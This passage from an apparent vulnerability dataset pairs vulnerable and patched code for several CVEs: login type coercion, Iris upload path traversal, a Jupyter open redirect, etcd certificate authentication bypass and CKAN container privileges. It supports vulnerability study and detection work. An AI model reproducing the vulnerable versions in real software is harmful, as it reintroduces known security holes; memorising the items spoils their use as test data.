}\n\n if (!bcrypt.compareSync(password, existingUser.password)) {\n await EventLogs.logEvent(\n \"failed_login_invalid_password\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[002] Invalid login credentials.\",\n });\n return;\n }\n\n if (existingUser.suspended) {\n await EventLogs.logEvent(\n \"failed_login_account_suspended\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[004] Account suspended by admin.\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\n \"login_event\",\n { multiUserMode: false },\n existingUser?.id\n );\n\n await EventLogs.logEvent(\n \"login_event\",\n {\n ip: request.ip || \"Unknown IP\",\n username: existingUser.username || \"Unknown user\",\n },\n existingUser?.id\n );\n\n response.status(200).json({\n valid: true,\n user: existingUser,\n token: makeJWT(\n { id: existingUser.id, username: existingUser.username },\n \"30d\"\n ),\n message: null,\n });\n return;\n } else {\n const { password } = reqBody(request);\n if (\n !bcrypt.compareSync(\n password,\n bcrypt.hashSync(process.env.AUTH_TOKEN, 10)\n )\n ) {\n await EventLogs.logEvent(\"failed_login_invalid_password\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(401).json({\n valid: false,\n token: null,\n message: \"[003] Invalid password provided\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\"login_event\", { multiUserMode: false });\n await EventLogs.logEvent(\"login_event\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(200).json({\n valid: true,\n token: makeJWT({ p: password }, \"30d\"),\n message: null,\n });\n }\n } catch (e) {\n console.log(e.message, e);\n response.sendStatus(500).end();\n }\n });"}], "fix_func": [{"id": "fix_js_93_1", "commit": "2374939", "file_path": "server/endpoints/system.js", "start_line": "102", "end_line": "224", "snippet": " app.post(\"/request-token\", 
async (request, response) => {\n try {\n const bcrypt = require(\"bcrypt\");\n\n if (await SystemSettings.isMultiUserMode()) {\n const { username, password } = reqBody(request);\n const existingUser = await User.get({ username: String(username) });\n\n if (!existingUser) {\n await EventLogs.logEvent(\n \"failed_login_invalid_username\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[001] Invalid login credentials.\",\n });\n return;\n }\n\n if (!bcrypt.compareSync(String(password), existingUser.password)) {\n await EventLogs.logEvent(\n \"failed_login_invalid_password\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[002] Invalid login credentials.\",\n });\n return;\n }\n\n if (existingUser.suspended) {\n await EventLogs.logEvent(\n \"failed_login_account_suspended\",\n {\n ip: request.ip || \"Unknown IP\",\n username: username || \"Unknown user\",\n },\n existingUser?.id\n );\n response.status(200).json({\n user: null,\n valid: false,\n token: null,\n message: \"[004] Account suspended by admin.\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\n \"login_event\",\n { multiUserMode: false },\n existingUser?.id\n );\n\n await EventLogs.logEvent(\n \"login_event\",\n {\n ip: request.ip || \"Unknown IP\",\n username: existingUser.username || \"Unknown user\",\n },\n existingUser?.id\n );\n\n response.status(200).json({\n valid: true,\n user: existingUser,\n token: makeJWT(\n { id: existingUser.id, username: existingUser.username },\n \"30d\"\n ),\n message: null,\n });\n return;\n } else {\n const { password } = reqBody(request);\n if (\n !bcrypt.compareSync(\n password,\n bcrypt.hashSync(process.env.AUTH_TOKEN, 10)\n )\n ) {\n await EventLogs.logEvent(\"failed_login_invalid_password\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(401).json({\n valid: false,\n token: null,\n message: \"[003] Invalid password provided\",\n });\n return;\n }\n\n await Telemetry.sendTelemetry(\"login_event\", { multiUserMode: false });\n await EventLogs.logEvent(\"login_event\", {\n ip: request.ip || \"Unknown IP\",\n multiUserMode: false,\n });\n response.status(200).json({\n valid: true,\n token: makeJWT({ p: password }, \"30d\"),\n message: null,\n });\n }\n } catch (e) {\n console.log(e.message, e);\n response.sendStatus(500).end();\n }\n });"}], "vul_patch": "--- a/server/endpoints/system.js\n+++ b/server/endpoints/system.js\n@@ -4,7 +4,7 @@\n \n if (await SystemSettings.isMultiUserMode()) {\n const { username, password } = reqBody(request);\n- const existingUser = await User.get({ username });\n+ const existingUser = await User.get({ username: String(username) });\n \n if (!existingUser) {\n await EventLogs.logEvent(\n@@ -24,7 +24,7 @@\n return;\n }\n \n- if (!bcrypt.compareSync(password, existingUser.password)) {\n+ if (!bcrypt.compareSync(String(password), existingUser.password)) {\n await EventLogs.logEvent(\n \"failed_login_invalid_password\",\n {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23772", "cve_description": "This affects all versions of package github.com/kataras/iris; all versions of package github.com/kataras/iris/v12. 
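As the record below shows, the fix replaces ad-hoc stripping of "../" sequences with `filepath.Base`, keeping only the final path component of the client-supplied filename. A hedged Python analogue of that sanitization (hypothetical helper; it applies both separator conventions, since clients on any OS may send either):

```python
import ntpath
import posixpath


def sanitize_upload_name(filename: str) -> str:
    """Reduce a client-supplied filename to its last path component."""
    # Apply both flavours so "a/b\\c" and "a\\b/c" each collapse to "c".
    name = ntpath.basename(posixpath.basename(filename))
    # A bare "", "." or ".." could still misbehave when joined; rename it.
    if name in ("", ".", ".."):
        name = "upload"
    return name


if __name__ == "__main__":
    for evil in ("../../etc/passwd", "..\\..\\boot.ini", "report.pdf"):
        print(evil, "->", sanitize_upload_name(evil))
```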
The unsafe handling of file names during upload using UploadFormFiles method may enable attackers to write to arbitrary locations outside the designated target folder.", "cwe_info": {"CWE-59": {"name": "Improper Link Resolution Before File Access ('Link Following')", "description": "The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource."}}, "repo": "https://github.com/kataras/iris", "patch_url": ["https://github.com/kataras/iris/commit/e213dba0d32ff66653e0ef124bc5088817264b08"], "programing_language": "Go", "vul_func": [{"id": "vul_go_272_1", "commit": "25ad31be505a70189af6bb22804ad559d3dc6df6", "file_path": "context/context.go", "start_line": 2021, "end_line": 2063, "snippet": "func (ctx *Context) FormFiles(key string, before ...func(*Context, *multipart.FileHeader) bool) (files []multipart.File, headers []*multipart.FileHeader, err error) {\n\terr = ctx.request.ParseMultipartForm(ctx.app.ConfigurationReadOnly().GetPostMaxMemory())\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif ctx.request.MultipartForm != nil {\n\t\tfhs := ctx.request.MultipartForm.File\n\t\tif n := len(fhs); n > 0 {\n\t\t\tfiles = make([]multipart.File, 0, n)\n\t\t\theaders = make([]*multipart.FileHeader, 0, n)\n\n\t\tinnerLoop:\n\t\t\tfor _, header := range fhs[key] {\n\t\t\t\t// Fix an issue that net/http has,\n\t\t\t\t// an attacker can push a filename\n\t\t\t\t// which could lead to override existing system files\n\t\t\t\t// by ../../$header.\n\t\t\t\t// Reported by Frank through security reports.\n\t\t\t\theader.Filename = strings.ReplaceAll(header.Filename, \"../\", \"\")\n\t\t\t\theader.Filename = strings.ReplaceAll(header.Filename, \"..\\\\\", \"\")\n\n\t\t\t\tfor _, b := range before {\n\t\t\t\t\tif !b(ctx, header) {\n\t\t\t\t\t\tcontinue innerLoop\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tfile, fErr := header.Open()\n\t\t\t\tif fErr != nil { // exit on first error but return the succeed.\n\t\t\t\t\treturn files, headers, fErr\n\t\t\t\t}\n\n\t\t\t\tfiles = append(files, file)\n\t\t\t\theaders = append(headers, header)\n\t\t\t}\n\t\t}\n\n\t\treturn\n\t}\n\n\treturn nil, nil, http.ErrMissingFile\n}"}, {"id": "vul_go_272_2", "commit": "25ad31be505a70189af6bb22804ad559d3dc6df6", "file_path": "context/context.go", "start_line": 2092, "end_line": 2131, "snippet": "func (ctx *Context) UploadFormFiles(destDirectory string, before ...func(*Context, *multipart.FileHeader) bool) (uploaded []*multipart.FileHeader, n int64, err error) {\n\terr = ctx.request.ParseMultipartForm(ctx.app.ConfigurationReadOnly().GetPostMaxMemory())\n\tif err != nil {\n\t\treturn nil, 0, err\n\t}\n\n\tif ctx.request.MultipartForm != nil {\n\t\tif fhs := ctx.request.MultipartForm.File; fhs != nil {\n\t\t\tfor _, files := range fhs {\n\t\t\tinnerLoop:\n\t\t\t\tfor _, file := range files {\n\t\t\t\t\t// Fix an issue that net/http has,\n\t\t\t\t\t// an attacker can push a filename\n\t\t\t\t\t// which could lead to override existing system files\n\t\t\t\t\t// by ../../$file.\n\t\t\t\t\t// Reported by Frank through security reports.\n\t\t\t\t\tfile.Filename = strings.ReplaceAll(file.Filename, \"../\", \"\")\n\t\t\t\t\tfile.Filename = strings.ReplaceAll(file.Filename, \"..\\\\\", \"\")\n\n\t\t\t\t\tfor _, b := range before {\n\t\t\t\t\t\tif !b(ctx, file) {\n\t\t\t\t\t\t\tcontinue innerLoop\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tn0, err0 := ctx.SaveFormFile(file, filepath.Join(destDirectory, file.Filename))\n\t\t\t\t\tif err0 != nil 
{\n\t\t\t\t\t\treturn nil, 0, err0\n\t\t\t\t\t}\n\t\t\t\t\tn += n0\n\n\t\t\t\t\tuploaded = append(uploaded, file)\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn uploaded, n, nil\n\t\t}\n\t}\n\n\treturn nil, 0, http.ErrMissingFile\n}"}], "fix_func": [{"id": "fix_go_272_1", "commit": "e213dba0d32ff66653e0ef124bc5088817264b08", "file_path": "context/context.go", "start_line": 2021, "end_line": 2057, "snippet": "func (ctx *Context) FormFiles(key string, before ...func(*Context, *multipart.FileHeader) bool) (files []multipart.File, headers []*multipart.FileHeader, err error) {\n\terr = ctx.request.ParseMultipartForm(ctx.app.ConfigurationReadOnly().GetPostMaxMemory())\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif ctx.request.MultipartForm != nil {\n\t\tfhs := ctx.request.MultipartForm.File\n\t\tif n := len(fhs); n > 0 {\n\t\t\tfiles = make([]multipart.File, 0, n)\n\t\t\theaders = make([]*multipart.FileHeader, 0, n)\n\n\t\tinnerLoop:\n\t\t\tfor _, header := range fhs[key] {\n\t\t\t\theader.Filename = filepath.Base(header.Filename)\n\n\t\t\t\tfor _, b := range before {\n\t\t\t\t\tif !b(ctx, header) {\n\t\t\t\t\t\tcontinue innerLoop\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tfile, fErr := header.Open()\n\t\t\t\tif fErr != nil { // exit on first error but return the succeed.\n\t\t\t\t\treturn files, headers, fErr\n\t\t\t\t}\n\n\t\t\t\tfiles = append(files, file)\n\t\t\t\theaders = append(headers, header)\n\t\t\t}\n\t\t}\n\n\t\treturn\n\t}\n\n\treturn nil, nil, http.ErrMissingFile\n}"}, {"id": "fix_go_272_2", "commit": "e213dba0d32ff66653e0ef124bc5088817264b08", "file_path": "context/context.go", "start_line": 2086, "end_line": 2121, "snippet": "func (ctx *Context) UploadFormFiles(destDirectory string, before ...func(*Context, *multipart.FileHeader) bool) (uploaded []*multipart.FileHeader, n int64, err error) {\n\terr = ctx.request.ParseMultipartForm(ctx.app.ConfigurationReadOnly().GetPostMaxMemory())\n\tif err != nil {\n\t\treturn nil, 0, err\n\t}\n\n\tif ctx.request.MultipartForm != nil {\n\t\tif fhs := ctx.request.MultipartForm.File; fhs != nil {\n\t\t\tfor _, files := range fhs {\n\t\t\tinnerLoop:\n\t\t\t\tfor _, file := range files {\n\t\t\t\t\t// Security fix for go < 1.17.5:\n\t\t\t\t\t// Reported by Kirill Efimov (snyk.io) through security reports.\n\t\t\t\t\tfile.Filename = filepath.Base(file.Filename)\n\n\t\t\t\t\tfor _, b := range before {\n\t\t\t\t\t\tif !b(ctx, file) {\n\t\t\t\t\t\t\tcontinue innerLoop\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\n\t\t\t\t\tn0, err0 := ctx.SaveFormFile(file, filepath.Join(destDirectory, file.Filename))\n\t\t\t\t\tif err0 != nil {\n\t\t\t\t\t\treturn nil, 0, err0\n\t\t\t\t\t}\n\t\t\t\t\tn += n0\n\n\t\t\t\t\tuploaded = append(uploaded, file)\n\t\t\t\t}\n\t\t\t}\n\t\t\treturn uploaded, n, nil\n\t\t}\n\t}\n\n\treturn nil, 0, http.ErrMissingFile\n}"}], "vul_patch": "--- a/context/context.go\n+++ b/context/context.go\n@@ -12,13 +12,7 @@\n \n \t\tinnerLoop:\n \t\t\tfor _, header := range fhs[key] {\n-\t\t\t\t// Fix an issue that net/http has,\n-\t\t\t\t// an attacker can push a filename\n-\t\t\t\t// which could lead to override existing system files\n-\t\t\t\t// by ../../$header.\n-\t\t\t\t// Reported by Frank through security reports.\n-\t\t\t\theader.Filename = strings.ReplaceAll(header.Filename, \"../\", \"\")\n-\t\t\t\theader.Filename = strings.ReplaceAll(header.Filename, \"..\\\\\", \"\")\n+\t\t\t\theader.Filename = filepath.Base(header.Filename)\n \n \t\t\t\tfor _, b := range before {\n \t\t\t\t\tif !b(ctx, header) {\n\n--- a/context/context.go\n+++ b/context/context.go\n@@ -9,13 +9,9 @@\n 
\t\t\tfor _, files := range fhs {\n \t\t\tinnerLoop:\n \t\t\t\tfor _, file := range files {\n-\t\t\t\t\t// Fix an issue that net/http has,\n-\t\t\t\t\t// an attacker can push a filename\n-\t\t\t\t\t// which could lead to override existing system files\n-\t\t\t\t\t// by ../../$file.\n-\t\t\t\t\t// Reported by Frank through security reports.\n-\t\t\t\t\tfile.Filename = strings.ReplaceAll(file.Filename, \"../\", \"\")\n-\t\t\t\t\tfile.Filename = strings.ReplaceAll(file.Filename, \"..\\\\\", \"\")\n+\t\t\t\t\t// Security fix for go < 1.17.5:\n+\t\t\t\t\t// Reported by Kirill Efimov (snyk.io) through security reports.\n+\t\t\t\t\tfile.Filename = filepath.Base(file.Filename)\n \n \t\t\t\t\tfor _, b := range before {\n \t\t\t\t\t\tif !b(ctx, file) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-26275", "cve_description": "The Jupyter Server provides the backend (i.e. the core services, APIs, and REST endpoints) for Jupyter web applications like Jupyter notebook, JupyterLab, and Voila. In Jupyter Server before version 1.1.1, an open redirect vulnerability could cause the jupyter server to redirect the browser to a different malicious website. All jupyter servers running without a base_url prefix are technically affected, however, these maliciously crafted links can only be reasonably made for known jupyter server hosts. A link to your jupyter server may *appear* safe, but ultimately redirect to a spoofed server on the public internet. This same vulnerability was patched in upstream notebook v5.7.8. This is fixed in jupyter_server 1.1.1. If upgrade is not available, a workaround can be to run your server on a url prefix: \"jupyter server --ServerApp.base_url=/jupyter/\".", "cwe_info": {"CWE-601": {"name": "URL Redirection to Untrusted Site ('Open Redirect')", "description": "The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect."}}, "repo": "https://github.com/jupyter-server/jupyter_server", "patch_url": ["https://github.com/jupyter-server/jupyter_server/commit/85e4abccf6ea9321d29153f73b0bd72ccb3a6bca"], "programing_language": "Python", "vul_func": [{"id": "vul_py_388_1", "commit": "b328e0a98fa553d3ec4cd911b6d11bb7363ddb0f", "file_path": "jupyter_server/auth/login.py", "start_line": 30, "end_line": 55, "snippet": " def _redirect_safe(self, url, default=None):\n \"\"\"Redirect if url is on our PATH\n\n Full-domain redirects are allowed if they pass our CORS origin checks.\n\n Otherwise use default (self.base_url if unspecified).\n \"\"\"\n if default is None:\n default = self.base_url\n if not url.startswith(self.base_url):\n # require that next_url be absolute path within our path\n allow = False\n # OR pass our cross-origin check\n if '://' in url:\n # if full URL, run our cross-origin check:\n parsed = urlparse(url.lower())\n origin = '%s://%s' % (parsed.scheme, parsed.netloc)\n if self.allow_origin:\n allow = self.allow_origin == origin\n elif self.allow_origin_pat:\n allow = bool(self.allow_origin_pat.match(origin))\n if not allow:\n # not allowed, use default\n self.log.warning(\"Not allowing login redirect to %r\" % url)\n url = default\n self.redirect(url)"}, {"id": "vul_py_388_2", "commit": "b328e0a98fa553d3ec4cd911b6d11bb7363ddb0f", "file_path": "jupyter_server/auth/login.py", "start_line": 71, "end_line": 92, "snippet": " def post(self):\n typed_password = self.get_argument('password', default=u'')\n new_password = self.get_argument('new_password', default=u'')\n\n if 
self.get_login_available(self.settings):\n if self.passwd_check(self.hashed_password, typed_password) and not new_password:\n self.set_login_cookie(self, uuid.uuid4().hex)\n elif self.token and self.token == typed_password:\n self.set_login_cookie(self, uuid.uuid4().hex)\n if new_password and self.settings.get('allow_password_change'):\n config_dir = self.settings.get('config_dir')\n config_file = os.path.join(config_dir, 'jupyter_server_config.json')\n set_password(new_password, config_file=config_file)\n self.log.info(\"Wrote hashed password to %s\" % config_file)\n else:\n self.set_status(401)\n self._render(message={'error': 'Invalid credentials'})\n return\n\n\n next_url = self.get_argument('next', default=self.base_url)\n self._redirect_safe(next_url)"}], "fix_func": [{"id": "fix_py_388_1", "commit": "85e4abccf6ea9321d29153f73b0bd72ccb3a6bca", "file_path": "jupyter_server/auth/login.py", "start_line": 30, "end_line": 60, "snippet": " def _redirect_safe(self, url, default=None):\n \"\"\"Redirect if url is on our PATH\n\n Full-domain redirects are allowed if they pass our CORS origin checks.\n\n Otherwise use default (self.base_url if unspecified).\n \"\"\"\n if default is None:\n default = self.base_url\n # protect chrome users from mishandling unescaped backslashes.\n # \\ is not valid in urls, but some browsers treat it as /\n # instead of %5C, causing `\\\\` to behave as `//`\n url = url.replace(\"\\\\\", \"%5C\")\n parsed = urlparse(url)\n if parsed.netloc or not (parsed.path + \"/\").startswith(self.base_url):\n # require that next_url be absolute path within our path\n allow = False\n # OR pass our cross-origin check\n if parsed.netloc:\n # if full URL, run our cross-origin check:\n origin = '%s://%s' % (parsed.scheme, parsed.netloc)\n origin = origin.lower()\n if self.allow_origin:\n allow = self.allow_origin == origin\n elif self.allow_origin_pat:\n allow = bool(self.allow_origin_pat.match(origin))\n if not allow:\n # not allowed, use default\n self.log.warning(\"Not allowing login redirect to %r\" % url)\n url = default\n self.redirect(url)"}, {"id": "fix_py_388_2", "commit": "85e4abccf6ea9321d29153f73b0bd72ccb3a6bca", "file_path": "jupyter_server/auth/login.py", "start_line": 76, "end_line": 99, "snippet": " def post(self):\n typed_password = self.get_argument('password', default=u'')\n new_password = self.get_argument('new_password', default=u'')\n\n if self.get_login_available(self.settings):\n if self.passwd_check(self.hashed_password, typed_password) and not new_password:\n self.set_login_cookie(self, uuid.uuid4().hex)\n elif self.token and self.token == typed_password:\n self.set_login_cookie(self, uuid.uuid4().hex)\n if new_password and self.settings.get(\"allow_password_change\"):\n config_dir = self.settings.get(\"config_dir\")\n config_file = os.path.join(\n config_dir, \"jupyter_notebook_config.json\"\n )\n set_password(new_password, config_file=config_file)\n self.log.info(\"Wrote hashed password to %s\" % config_file)\n else:\n self.set_status(401)\n self._render(message={'error': 'Invalid credentials'})\n return\n\n\n next_url = self.get_argument('next', default=self.base_url)\n self._redirect_safe(next_url)"}], "vul_patch": "--- a/jupyter_server/auth/login.py\n+++ b/jupyter_server/auth/login.py\n@@ -7,14 +7,19 @@\n \"\"\"\n if default is None:\n default = self.base_url\n- if not url.startswith(self.base_url):\n+ # protect chrome users from mishandling unescaped backslashes.\n+ # \\ is not valid in urls, but some browsers treat it as /\n+ # instead of %5C, 
causing `\\\\` to behave as `//`\n+ url = url.replace(\"\\\\\", \"%5C\")\n+ parsed = urlparse(url)\n+ if parsed.netloc or not (parsed.path + \"/\").startswith(self.base_url):\n # require that next_url be absolute path within our path\n allow = False\n # OR pass our cross-origin check\n- if '://' in url:\n+ if parsed.netloc:\n # if full URL, run our cross-origin check:\n- parsed = urlparse(url.lower())\n origin = '%s://%s' % (parsed.scheme, parsed.netloc)\n+ origin = origin.lower()\n if self.allow_origin:\n allow = self.allow_origin == origin\n elif self.allow_origin_pat:\n\n--- a/jupyter_server/auth/login.py\n+++ b/jupyter_server/auth/login.py\n@@ -7,9 +7,11 @@\n self.set_login_cookie(self, uuid.uuid4().hex)\n elif self.token and self.token == typed_password:\n self.set_login_cookie(self, uuid.uuid4().hex)\n- if new_password and self.settings.get('allow_password_change'):\n- config_dir = self.settings.get('config_dir')\n- config_file = os.path.join(config_dir, 'jupyter_server_config.json')\n+ if new_password and self.settings.get(\"allow_password_change\"):\n+ config_dir = self.settings.get(\"config_dir\")\n+ config_file = os.path.join(\n+ config_dir, \"jupyter_notebook_config.json\"\n+ )\n set_password(new_password, config_file=config_file)\n self.log.info(\"Wrote hashed password to %s\" % config_file)\n else:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-16886", "cve_description": "etcd versions 3.2.x before 3.2.26 and 3.3.x before 3.3.11 are vulnerable to an improper authentication issue when role-based access control (RBAC) is used and client-cert-auth is enabled. If an etcd client server TLS certificate contains a Common Name (CN) which matches a valid RBAC username, a remote attacker may authenticate as that user with any valid (trusted) client certificate in a REST API request to the gRPC-gateway.", "cwe_info": {"CWE-285": {"name": "Improper Authorization", "description": "The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-250": {"name": "Execution with Unnecessary Privileges", "description": "The product performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses."}, "CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/etcd-io/etcd", "patch_url": ["https://github.com/etcd-io/etcd/commit/bf9d0d8291dc71ecbfb2690612954e1a298154b2", "https://github.com/etcd-io/etcd/commit/0191509637546621d6f2e18e074e955ab8ef374d"], "programing_language": "Go", "vul_func": [{"id": "vul_go_158_1", "commit": "9c6b407", "file_path": "auth/store.go", "start_line": 1154, "end_line": 1182, "snippet": "func (as *authStore) AuthInfoFromTLS(ctx context.Context) (ai *AuthInfo) {\n\tpeer, ok := peer.FromContext(ctx)\n\tif !ok || peer == nil || peer.AuthInfo == nil {\n\t\treturn nil\n\t}\n\n\ttlsInfo := peer.AuthInfo.(credentials.TLSInfo)\n\tfor _, chains := range tlsInfo.State.VerifiedChains {\n\t\tif len(chains) < 1 {\n\t\t\tcontinue\n\t\t}\n\t\tai = &AuthInfo{\n\t\t\tUsername: chains[0].Subject.CommonName,\n\t\t\tRevision: as.Revision(),\n\t\t}\n\t\tif as.lg != nil {\n\t\t\tas.lg.Debug(\n\t\t\t\t\"found command name\",\n\t\t\t\tzap.String(\"common-name\", 
ai.Username),\n\t\t\t\tzap.String(\"user-name\", ai.Username),\n\t\t\t\tzap.Uint64(\"revision\", ai.Revision),\n\t\t\t)\n\t\t} else {\n\t\t\tplog.Debugf(\"found common name %s\", ai.Username)\n\t\t}\n\t\tbreak\n\t}\n\treturn ai\n}"}], "fix_func": [{"id": "fix_go_158_1", "commit": "bf9d0d8", "file_path": "auth/store.go", "start_line": 1154, "end_line": 1203, "snippet": "func (as *authStore) AuthInfoFromTLS(ctx context.Context) (ai *AuthInfo) {\n\tpeer, ok := peer.FromContext(ctx)\n\tif !ok || peer == nil || peer.AuthInfo == nil {\n\t\treturn nil\n\t}\n\n\ttlsInfo := peer.AuthInfo.(credentials.TLSInfo)\n\tfor _, chains := range tlsInfo.State.VerifiedChains {\n\t\tif len(chains) < 1 {\n\t\t\tcontinue\n\t\t}\n\t\tai = &AuthInfo{\n\t\t\tUsername: chains[0].Subject.CommonName,\n\t\t\tRevision: as.Revision(),\n\t\t}\n\t\tmd, ok := metadata.FromIncomingContext(ctx)\n\t\tif !ok {\n\t\t\treturn nil\n\t\t}\n\n\t\t// gRPC-gateway proxy request to etcd server includes Grpcgateway-Accept\n\t\t// header. The proxy uses etcd client server certificate. If the certificate\n\t\t// has a CommonName we should never use this for authentication.\n\t\tif gw := md[\"grpcgateway-accept\"]; len(gw) > 0 {\n\t\t\tif as.lg != nil {\n\t\t\t\tas.lg.Warn(\n\t\t\t\t\t\"ignoring common name in gRPC-gateway proxy request\",\n\t\t\t\t\tzap.String(\"common-name\", ai.Username),\n\t\t\t\t\tzap.String(\"user-name\", ai.Username),\n\t\t\t\t\tzap.Uint64(\"revision\", ai.Revision),\n\t\t\t\t)\n\t\t\t} else {\n\t\t\t\tplog.Warningf(\"ignoring common name in gRPC-gateway proxy request %s\", ai.Username)\n\t\t\t}\n\t\t\treturn nil\n\t\t}\n\t\tif as.lg != nil {\n\t\t\tas.lg.Debug(\n\t\t\t\t\"found command name\",\n\t\t\t\tzap.String(\"common-name\", ai.Username),\n\t\t\t\tzap.String(\"user-name\", ai.Username),\n\t\t\t\tzap.Uint64(\"revision\", ai.Revision),\n\t\t\t)\n\t\t} else {\n\t\t\tplog.Debugf(\"found common name %s\", ai.Username)\n\t\t}\n\t\tbreak\n\t}\n\treturn ai\n}"}], "vul_patch": "--- a/auth/store.go\n+++ b/auth/store.go\n@@ -13,6 +13,27 @@\n \t\t\tUsername: chains[0].Subject.CommonName,\n \t\t\tRevision: as.Revision(),\n \t\t}\n+\t\tmd, ok := metadata.FromIncomingContext(ctx)\n+\t\tif !ok {\n+\t\t\treturn nil\n+\t\t}\n+\n+\t\t// gRPC-gateway proxy request to etcd server includes Grpcgateway-Accept\n+\t\t// header. The proxy uses etcd client server certificate. If the certificate\n+\t\t// has a CommonName we should never use this for authentication.\n+\t\tif gw := md[\"grpcgateway-accept\"]; len(gw) > 0 {\n+\t\t\tif as.lg != nil {\n+\t\t\t\tas.lg.Warn(\n+\t\t\t\t\t\"ignoring common name in gRPC-gateway proxy request\",\n+\t\t\t\t\tzap.String(\"common-name\", ai.Username),\n+\t\t\t\t\tzap.String(\"user-name\", ai.Username),\n+\t\t\t\t\tzap.Uint64(\"revision\", ai.Revision),\n+\t\t\t\t)\n+\t\t\t} else {\n+\t\t\t\tplog.Warningf(\"ignoring common name in gRPC-gateway proxy request %s\", ai.Username)\n+\t\t\t}\n+\t\t\treturn nil\n+\t\t}\n \t\tif as.lg != nil {\n \t\t\tas.lg.Debug(\n \t\t\t\t\"found command name\",\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-32696", "cve_description": "CKAN is an open-source data management system for powering data hubs and data portals. Prior to versions 2.9.9 and 2.10.1, the `ckan` user (equivalent to www-data) owned code and configuration files in the docker container and the `ckan` user had the permissions to use sudo. These issues allowed for code execution or privilege escalation if an arbitrary file write bug was available. 
Versions 2.9.9, 2.9.9-dev, 2.10.1, and 2.10.1-dev contain a patch.\n\n\n\n", "cwe_info": {"CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/ckan/ckan-docker-base", "patch_url": ["https://github.com/ckan/ckan-docker-base/commit/5483c46ce9b518a4e1b626ef7032cce2c1d75c7d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_236_1", "commit": "f145acd", "file_path": "ckan-2.10/base/setup/prerun.py", "start_line": 160, "end_line": 196, "snippet": "def create_sysadmin():\n\n name = os.environ.get(\"CKAN_SYSADMIN_NAME\")\n password = os.environ.get(\"CKAN_SYSADMIN_PASSWORD\")\n email = os.environ.get(\"CKAN_SYSADMIN_EMAIL\")\n\n if name and password and email:\n\n # Check if user exists\n command = [\"ckan\", \"-c\", ckan_ini, \"user\", \"show\", name]\n\n out = subprocess.check_output(command)\n if b\"User:None\" not in re.sub(b\"\\s\", b\"\", out):\n print(\"[prerun] Sysadmin user exists, skipping creation\")\n return\n\n # Create user\n command = [\n \"ckan\",\n \"-c\",\n ckan_ini,\n \"user\",\n \"add\",\n name,\n \"password=\" + password,\n \"email=\" + email,\n ]\n\n subprocess.call(command)\n print(\"[prerun] Created user {0}\".format(name))\n\n # Make it sysadmin\n command = [\"ckan\", \"-c\", ckan_ini, \"sysadmin\", \"add\", name]\n\n subprocess.call(command)\n print(\"[prerun] Made user {0} a sysadmin\".format(name))\n"}], "fix_func": [{"id": "fix_py_236_1", "commit": "5483c46", "file_path": "ckan-2.10/base/setup/prerun.py", "start_line": 160, "end_line": 203, "snippet": "def create_sysadmin():\n\n name = os.environ.get(\"CKAN_SYSADMIN_NAME\")\n password = os.environ.get(\"CKAN_SYSADMIN_PASSWORD\")\n email = os.environ.get(\"CKAN_SYSADMIN_EMAIL\")\n\n if name and password and email:\n\n # Check if user exists\n command = [\"ckan\", \"-c\", ckan_ini, \"user\", \"show\", name]\n\n out = subprocess.check_output(command)\n if b\"User:None\" not in re.sub(b\"\\s\", b\"\", out):\n print(\"[prerun] Sysadmin user exists, skipping creation\")\n return\n\n # Create user\n command = [\n \"ckan\",\n \"-c\",\n ckan_ini,\n \"user\",\n \"add\",\n name,\n \"password=\" + password,\n \"email=\" + email,\n ]\n\n subprocess.call(command)\n print(\"[prerun] Created user {0}\".format(name))\n\n # Make it sysadmin\n command = [\"ckan\", \"-c\", ckan_ini, \"sysadmin\", \"add\", name]\n\n subprocess.call(command)\n print(\"[prerun] Made user {0} a sysadmin\".format(name))\n\n # cleanup permissions\n # We're running as root before pivoting to uwsgi and dropping privs\n data_dir = \"%s/storage\" % os.environ['CKAN_STORAGE_PATH']\n\n command = [\"chown\", \"-R\", \"ckan:ckan\", data_dir]\n subprocess.call(command)\n print(\"[prerun] Ensured storage directory is owned by ckan\")"}], "vul_patch": "--- a/ckan-2.10/base/setup/prerun.py\n+++ b/ckan-2.10/base/setup/prerun.py\n@@ -34,3 +34,11 @@\n \n subprocess.call(command)\n print(\"[prerun] 